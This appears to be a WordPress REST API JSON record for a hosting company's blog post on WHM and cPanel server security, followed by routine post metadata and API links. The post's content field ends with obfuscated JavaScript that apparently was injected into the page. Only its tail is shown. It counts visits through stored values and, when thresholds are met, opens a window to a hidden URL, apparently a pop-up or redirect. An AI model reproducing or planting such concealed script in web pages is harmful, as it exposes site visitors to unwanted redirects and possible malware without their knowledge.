_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script>","protected":false},"excerpt":{"rendered":"Enhancing the security of your server is a crucial task, but it isn&#8217;t next to impossible, it can&hellip;\n","protected":false},"author":1,"featured_media":6326,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"csco_singular_sidebar":"","csco_page_header_type":"","csco_appearance_grid":"","csco_page_load_nextpost":"","csco_post_video_location":[],"csco_post_video_location_hash":"","csco_post_video_url":"","csco_post_video_bg_start_time":0,"csco_post_video_bg_end_time":0,"footnotes":""},"categories":[160],"tags":[362,292,361,162,161,136,363],"class_list":{"0":"post-4148","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-whm","8":"tag-2-factor-authentication","9":"tag-bitninja-security","10":"tag-cloud-linux","11":"tag-cpanel-security","12":"tag-mysql","13":"tag-whm","14":"tag-whm-security","15":"cs-entry","16":"cs-video-wrap"},"_links":{"self":[{"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/posts\/4148","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/comments?post=4148"}],"version-history":[{"count":11,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/posts\/4148\/revisions"}],"predecessor-version":[{"id":7645,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/posts\/4148\/revisions\/7645"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/media\/6326"}],"wp:attachment":[{"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/media?parent=4148"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/categories?post=4148"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.cloudhostworld.com\/blog\/wp-json\/wp\/v2\/tags?post=4148"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}